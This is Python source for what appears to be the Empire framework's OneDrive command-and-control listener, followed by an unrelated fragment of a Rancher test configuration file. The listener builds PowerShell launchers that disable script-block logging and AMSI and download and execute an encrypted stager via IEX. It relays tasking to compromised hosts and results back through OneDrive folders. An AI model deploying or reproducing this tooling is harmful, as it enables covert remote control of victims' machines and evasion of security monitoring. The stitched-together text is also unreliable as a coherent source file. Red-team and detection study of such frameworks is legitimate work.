import base64
import random
import os
import re
import time
from datetime import datetime
import copy
import traceback
import sys
import json
from pydispatch import dispatcher
from requests import Request, Session
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import bypasses
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Onedrive',
'Author': ['@mr64bit'],
'Description': (
'Starts a Onedrive listener. Setup instructions here: gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9'),
'Category': ('third_party'),
'Comments': ["Note that deleting STAGE0-PS.txt from the staging folder will break existing launchers"]
}
self.options = {
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'onedrive'
},
'ClientID': {
'Description': 'Application ID of the OAuth App.',
'Required': True,
'Value': ''
},
'ClientSecret': {
'Description': 'Client secret of the OAuth App.',
'Required': True,
'Value': ''
},
'AuthCode': {
'Description': 'Auth code given after authenticating OAuth App.',
'Required': True,
'Value': ''
},
'BaseFolder': {
'Description': 'The base Onedrive folder to use for comms.',
'Required': True,
'Value': 'empire'
},
'StagingFolder': {
'Description': 'The nested Onedrive staging folder.',
'Required': True,
'Value': 'staging'
},
'TaskingsFolder': {
'Description': 'The nested Onedrive taskings folder.',
'Required': True,
'Value': 'taskings'
},
'ResultsFolder': {
'Description': 'The nested Onedrive results folder.',
'Required': True,
'Value': 'results'
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for intial agent negotiation.',
'Required': True,
'Value': 'asdf'
},
'PollInterval': {
'Description': 'Polling interval (in seconds) to communicate with Onedrive.',
'Required': True,
'Value': '5'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 10
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 10
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "N/A|Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)"
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RefreshToken': {
'Description': 'Refresh token used to refresh the auth token',
'Required': False,
'Value': ''
},
'RedirectURI': {
'Description': 'Redirect URI of the registered application',
'Required': True,
'Value': "https://login.live.com/oauth20_desktop.srf"
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
self.mainMenu = mainMenu
self.threads = {}
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
return ''
def validate_options(self):
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# If we don't have an OAuth code yet, give the user a URL to get it
if (str(self.options['RefreshToken']['Value']).strip() == '') and (
str(self.options['AuthCode']['Value']).strip() == ''):
if (str(self.options['ClientID']['Value']).strip() == ''):
print(helpers.color("[!] ClientID needed to generate AuthCode URL!"))
return False
params = {'client_id': str(self.options['ClientID']['Value']).strip(),
'response_type': 'code',
'redirect_uri': self.options['RedirectURI']['Value'],
'scope': 'files.readwrite offline_access'}
req = Request('GET', 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize', params=params)
prep = req.prepare()
print(helpers.color("[*] Get your AuthCode from \"%s\" and try starting the listener again." % prep.url))
return False
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
if not language:
print(helpers.color("[!] listeners/onedrive generate_launcher(): No language specified"))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
listener_options = self.mainMenu.listeners.activeListeners[listenerName]['options']
staging_key = listener_options['StagingKey']['Value']
profile = listener_options['DefaultProfile']['Value']
launcher_cmd = listener_options['Launcher']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
base_folder = listener_options['BaseFolder']['Value'].strip("/")
staging_folder = listener_options['StagingFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if language.startswith("power"):
launcher = "$ErrorActionPreference = 'SilentlyContinue';" # Set as empty string for debugging
if safeChecks.lower() == 'true':
launcher = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
launcher += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
launcher += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
launcher += bypasses.AMSIBypass2()
launcher += "};"
launcher += helpers.randomize_capitalization(
"[System.Net.ServicePointManager]::Expect100Continue=0;")
launcher += helpers.randomize_capitalization("$wc=New-Object SYstem.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listener_options['DefaultProfile']['Value']
userAgent = profile.split("|")[1]
launcher += "$u='" + userAgent + "';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
launcher += helpers.randomize_capitalization("$wc.Headers.Add(")
launcher += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
launcher += helpers.randomize_capitalization(
"$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
launcher += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
launcher += helpers.randomize_capitalization("$proxy.Address = '" + proxy.lower() + "';")
launcher += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
launcher += helpers.randomize_capitalization(
"$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
launcher += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
launcher += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
launcher += "$Script:Proxy = $wc.Proxy;"
# code to turn the key string into a byte array
launcher += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
launcher += ("'%s');" % staging_key)
# this is the minimized RC4 launcher code from rc4.ps1
launcher += helpers.randomize_capitalization(
'$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
launcher += helpers.randomize_capitalization("$data=$wc.DownloadData('")
launcher += self.mainMenu.listeners.activeListeners[listenerName]['stager_url']
launcher += helpers.randomize_capitalization("');$iv=$data[0..3];$data=$data[4..$data.length];")
launcher += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
launcher = helpers.obfuscate(self.mainMenu.installPath, launcher,
obfuscationCommand=obfuscationCommand)
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(launcher, launcher_cmd)
else:
return launcher
if language.startswith("pyth"):
print(helpers.color("[!] listeners/onedrive generate_launcher(): Python agent not implimented yet"))
return "python not implimented yet"
else:
print(helpers.color("[!] listeners/onedrive generate_launcher(): invalid listener name"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None, token=None):
"""
Generate the stager code
"""
if not language:
print(helpers.color("[!] listeners/onedrive generate_stager(): no language specified"))
return None
staging_key = listenerOptions['StagingKey']['Value']
base_folder = listenerOptions['BaseFolder']['Value']
staging_folder = listenerOptions['StagingFolder']['Value']
working_hours = listenerOptions['WorkingHours']['Value']
profile = listenerOptions['DefaultProfile']['Value']
agent_delay = listenerOptions['DefaultDelay']['Value']
if language.lower() == 'powershell':
f = open("%s/data/agent/stagers/onedrive.ps1" % self.mainMenu.installPath)
stager = f.read()
f.close()
stager = stager.replace("REPLACE_STAGING_FOLDER", "%s/%s" % (base_folder, staging_folder))
stager = stager.replace('REPLACE_STAGING_KEY', staging_key)
stager = stager.replace("REPLACE_TOKEN", token)
stager = stager.replace("REPLACE_POLLING_INTERVAL", str(agent_delay))
if working_hours != "":
stager = stager.replace("REPLACE_WORKING_HOURS", working_hours)
randomized_stager = ''
for line in stager.split("\n"):
line = line.strip()
if not line.startswith("#"):
if "\"" not in line:
randomized_stager += helpers.randomize_capitalization(line)
else:
randomized_stager += line
if encode:
return helpers.enc_powershell(randomized_stager)
elif encrypt:
RC4IV = os.urandom(4)
staging_key = staging_key.encode('UTF-8')
return RC4IV + encryption.rc4(RC4IV + staging_key, randomized_stager.encode('UTF-8'))
else:
return randomized_stager
else:
print(helpers.color("[!] Python agent not available for Onedrive"))
def generate_comms(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri,
language=None):
staging_key = listener_options['StagingKey']['Value']
base_folder = listener_options['BaseFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if not language:
print(helpers.color("[!] listeners/onedrive generate_comms(): No language specified"))
return
if language.lower() == "powershell":
# Function to generate a WebClient object with the required headers
token_manager = """
$Script:TokenObject = @{token="%s";refresh="%s";expires=(Get-Date).addSeconds(3480)};
$script:GetWebClient = {
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
if((Get-Date) -gt $Script:TokenObject.expires) {
$data = New-Object System.Collections.Specialized.NameValueCollection
$data.add("client_id", "%s")
$data.add("client_secret", "%s")
$data.add("grant_type", "refresh_token")
$data.add("scope", "files.readwrite offline_access")
$data.add("refresh_token", $Script:TokenObject.refresh)
$data.add("redirect_uri", "%s")
$bytes = $wc.UploadValues("https://login.microsoftonline.com/common/oauth2/v2.0/token", "POST", $data)
$response = [system.text.encoding]::ascii.getstring($bytes)
$Script:TokenObject.token = [regex]::match($response, '"access_token":"(.+?)"').groups[1].value
$Script:TokenObject.refresh = [regex]::match($response, '"refresh_token":"(.+?)"').groups[1].value
$expires_in = [int][regex]::match($response, '"expires_in":([0-9]+)').groups[1].value
$Script:TokenObject.expires = (get-date).addSeconds($expires_in - 15)
}
$wc.headers.add("User-Agent", $script:UserAgent)
$wc.headers.add("Authorization", "Bearer $($Script:TokenObject.token)")
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
$wc
}
""" % (token, refresh_token, client_id, client_secret, redirect_uri)
post_message = """
$script:SendMessage = {
param($packets)
if($packets) {
$encBytes = encrypt-bytes $packets
$RoutingPacket = New-RoutingPacket -encData $encBytes -Meta 5
} else {
$RoutingPacket = ""
}
$wc = (& $GetWebClient)
$resultsFolder = "%s"
try {
try {
$data = $null
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content")
} catch {}
if($data -and $data.length -ne 0) {
$routingPacket = $data + $routingPacket
}
$wc = (& $GetWebClient)
$null = $wc.UploadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content", "PUT", $RoutingPacket)
$script:missedChecking = 0
$script:lastseen = get-date
}
catch {
if($_ -match "Unable to connect") {
$script:missedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, results_folder))
get_message = """
$script:lastseen = Get-Date
$script:GetTask = {
try {
$wc = (& $GetWebClient)
$TaskingsFolder = "%s"
#If we haven't sent a message recently...
if($script:lastseen.addseconds($script:AgentDelay * 2) -lt (get-date)) {
(& $SendMessage -packets "")
}
$script:MissedCheckins = 0
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt:/content")
if($data -and ($data.length -ne 0)) {
$wc = (& $GetWebClient)
$null = $wc.UploadString("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt", "DELETE", "")
if([system.text.encoding]::utf8.getString($data) -eq "RESTAGE") {
Start-Negotiate -T $script:TokenObject.token -SK $SK -PI $PI -UA $UA
}
$Data
}
}
catch {
if($_ -match "Unable to connect") {
$script:MissedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, taskings_folder))
return token_manager + post_message + get_message
def generate_agent(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri,
language=None):
"""
Generate the agent code
"""
if not language:
print(helpers.color("[!] listeners/onedrive generate_agent(): No language specified"))
return
language = language.lower()
delay = listener_options['DefaultDelay']['Value']
jitter = listener_options['DefaultJitter']['Value']
profile = listener_options['DefaultProfile']['Value']
lost_limit = listener_options['DefaultLostLimit']['Value']
working_hours = listener_options['WorkingHours']['Value']
kill_date = listener_options['KillDate']['Value']
b64_default_response = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
agent_code = f.read()
f.close()
comms_code = self.generate_comms(listener_options, client_id, client_secret, token, refresh_token,
redirect_uri, language)
agent_code = agent_code.replace("REPLACE_COMMS", comms_code)
agent_code = helpers.strip_powershell_comments(agent_code)
agent_code = agent_code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
agent_code = agent_code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
agent_code = agent_code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
agent_code = agent_code.replace('$LostLimit = 60', "$LostLimit = " + str(lost_limit))
agent_code = agent_code.replace('$DefaultResponse = ""',
'$DefaultResponse = "' + b64_default_response.decode('UTF-8') + '"')
if kill_date != "":
agent_code = agent_code.replace("$KillDate,", "$KillDate = '" + str(kill_date) + "',")
return agent_code
def start_server(self, listenerOptions):
# Utility functions to handle auth tasks and initial setup
def get_token(client_id, client_secret, code):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'authorization_code',
'scope': 'files.readwrite offline_access',
'code': code,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError as e:
print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (
r.status_code, r.json()['error_codes'], r.json()['error_description'])))
raise
def renew_token(client_id, client_secret, refresh_token):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'refresh_token',
'scope': 'files.readwrite offline_access',
'refresh_token': refresh_token,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError as e:
print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (
r.status_code, r.json()['error_codes'], r.json()['error_description'])))
raise
def test_token(token):
headers = s.headers.copy()
headers['Authorization'] = 'Bearer ' + token
request = s.get("%s/drive" % base_url, headers=headers)
return request.ok
def setup_folders():
if not (test_token(token['access_token'])):
raise ValueError("Could not set up folders, access token invalid")
base_object = s.get("%s/drive/root:/%s" % (base_url, base_folder))
if not (base_object.status_code == 200):
print(helpers.color("[*] Creating %s folder" % base_folder))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': base_folder}
base_object = s.post("%s/drive/items/root/children" % base_url, json=params)
else:
message = "[*] {} folder already exists".format(base_folder)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
for item in [staging_folder, taskings_folder, results_folder]:
item_object = s.get("%s/drive/root:/%s/%s" % (base_url, base_folder, item))
if not (item_object.status_code == 200):
print(helpers.color("[*] Creating %s/%s folder" % (base_folder, item)))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': item}
item_object = s.post("%s/drive/items/%s/children" % (base_url, base_object.json()['id']),
json=params)
else:
message = "[*] {}/{} already exists".format(base_folder, item)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
def upload_launcher():
ps_launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=False,
userAgent='none', proxy='none', proxyCreds='none')
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "LAUNCHER-PS.TXT"),
data=ps_launcher, headers={"Content-Type": "text/plain"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
launcher_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
def upload_stager():
ps_stager = self.generate_stager(listenerOptions=listener_options, language='powershell',
token=token['access_token'])
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "STAGE0-PS.txt"),
data=ps_stager, headers={"Content-Type": "application/octet-stream"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
stager_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
# Different domain for some reason?
self.mainMenu.listeners.activeListeners[listener_name]['stager_url'] = stager_url
else:
print(helpers.color("[!] Something went wrong uploading stager"))
message = r.content
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
listener_options = copy.deepcopy(listenerOptions)
listener_name = listener_options['Name']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
client_id = listener_options['ClientID']['Value']
client_secret = listener_options['ClientSecret']['Value']
auth_code = listener_options['AuthCode']['Value']
refresh_token = listener_options['RefreshToken']['Value']
base_folder = listener_options['BaseFolder']['Value']
staging_folder = listener_options['StagingFolder']['Value'].strip('/')
taskings_folder = listener_options['TaskingsFolder']['Value'].strip('/')
results_folder = listener_options['ResultsFolder']['Value'].strip('/')
redirect_uri = listener_options['RedirectURI']['Value']
base_url = "https://graph.microsoft.com/v1.0"
s = Session()
if refresh_token:
token = renew_token(client_id, client_secret, refresh_token)
message = "[*] Refreshed auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
else:
token = get_token(client_id, client_secret, auth_code)
message = "[*] Got new auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive")
s.headers['Authorization'] = "Bearer " + token['access_token']
setup_folders()
while True:
# Wait until Empire is aware the listener is running, so we can save our refresh token and stager URL
try:
if listener_name in list(self.mainMenu.listeners.activeListeners.keys()):
upload_stager()
upload_launcher()
break
else:
time.sleep(1)
except AttributeError:
time.sleep(1)
while True:
time.sleep(int(poll_interval))
try: # Wrap the whole loop in a try/catch so one error won't kill the listener
if time.time() > token['expires_at']: # Get a new token if the current one has expired
token = renew_token(client_id, client_secret, token['refresh_token'])
s.headers['Authorization'] = "Bearer " + token['access_token']
message = "[*] Refreshed auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
upload_stager()
if token['update']:
self.mainMenu.listeners.update_listener_options(listener_name, "RefreshToken",
token['refresh_token'])
token['update'] = False
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, staging_folder))
for item in search.json()['children']: # Iterate all items in the staging folder
try:
reg = re.search("^([A-Z0-9]+)_([0-9]).txt", item['name'])
if not reg:
continue
agent_name, stage = reg.groups()
if stage == '1': # Download stage 1, upload stage 2
message = "[*] Downloading {}/{}/{} {}".format(base_folder, staging_folder, item['name'],
item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = \
self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(base_folder, staging_folder,
agent_name, str(len(return_val)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (
base_url, base_folder, staging_folder, agent_name), data=return_val)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
if stage == '3': # Download stage 3, upload stage 4 (full agent code)
message = "[*] Downloading {}/{}/{}, {} bytes".format(base_folder, staging_folder,
item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = \
self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
session_key = self.mainMenu.agents.agents[agent_name]['sessionKey']
agent_token = renew_token(client_id, client_secret, token[
'refresh_token']) # Get auth and refresh tokens for the agent to use
agent_code = str(self.generate_agent(listener_options, client_id, client_secret,
agent_token['access_token'],
agent_token['refresh_token'], redirect_uri, lang))
enc_code = encryption.aes_encrypt_then_hmac(session_key, agent_code)
message = "[*] Uploading {}/{}/{}_4.txt, {} bytes".format(base_folder, staging_folder,
agent_name, str(len(enc_code)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_4.txt:/content" % (
base_url, base_folder, staging_folder, agent_name), data=enc_code)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception as e:
print(helpers.color(
"[!] Could not handle agent staging for listener %s, continuing" % listener_name))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
agent_ids = self.mainMenu.agents.get_agents_for_listener(listener_name)
for agent_id in agent_ids: # Upload any tasks for the current agents
if isinstance(agent_id,bytes):
agent_id = agent_id.decode('UTF-8')
task_data = self.mainMenu.agents.handle_agent_request(agent_id, 'powershell', staging_key,
update_lastseen=True)
if task_data:
try:
r = s.get("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id))
if r.status_code == 200: # If there's already something there, download and append the new data
task_data = r.content + task_data
message = "[*] Uploading agent tasks for {}, {} bytes".format(agent_id, str(len(task_data)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id), data=task_data)
except Exception as e:
message = "[!] Error uploading agent tasks for {}, {}".format(agent_id, e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, results_folder))
for item in search.json()['children']: # For each file in the results folder
try:
agent_id = item['name'].split(".")[0]
for i in range(len(agent_ids)):
agent_ids[i] = agent_ids[i].decode('UTF-8')
if not agent_id in agent_ids: # If we don't recognize that agent, upload a message to restage
print(helpers.color(
"[*] Invalid agent, deleting %s/%s and restaging" % (results_folder, item['name'])))
s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id), data="RESTAGE")
s.delete("%s/drive/items/%s" % (base_url, item['id']))
continue
try: # Update the agent's last seen time, from the file timestamp
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%S.%fZ")
except: # sometimes no ms for some reason...
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%SZ")
seen_time = helpers.utc_to_local(seen_time)
self.mainMenu.agents.update_agent_lastseen_db(agent_id, seen_time)
# If the agent is just checking in, the file will only be 1 byte, so no results to fetch
if (item['size'] > 1):
message = "[*] Downloading results from {}/{}, {} bytes".format(results_folder,
item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.get(item['@microsoft.graph.downloadUrl'])
self.mainMenu.agents.handle_agent_data(staging_key, r.content, listener_options,
update_lastseen=True)
message = "[*] Deleting {}/{}".format(results_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception as e:
message = "[!] Error handling agent results for {}, {}".format(item['name'], e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
except Exception as e:
print(helpers.color("[!] Something happened in listener %s: %s, continuing" % (listener_name, e)))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.close()
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
|
common.py
|
from ..common import * # NOQA
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 320
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
DEFAULT_APP_V2_TIMEOUT = 60
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
HARDENED_CLUSTER = ast.literal_eval(
os.environ.get('RANCHER_HARDENED_CLUSTER', "False"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_PORT = os.environ.get('RANCHER_TEST_IMAGE_PORT', "80")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
skip_test_hardened = pytest.mark.skipif(
HARDENED_CLUSTER,
reason='Tests Skipped due to being a hardened cluster')
UPDATE_KDM = ast.literal_eval(os.environ.get('RANCHER_UPDATE_KDM', "False"))
KDM_URL = os.environ.get("RANCHER_KDM_URL", "")
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
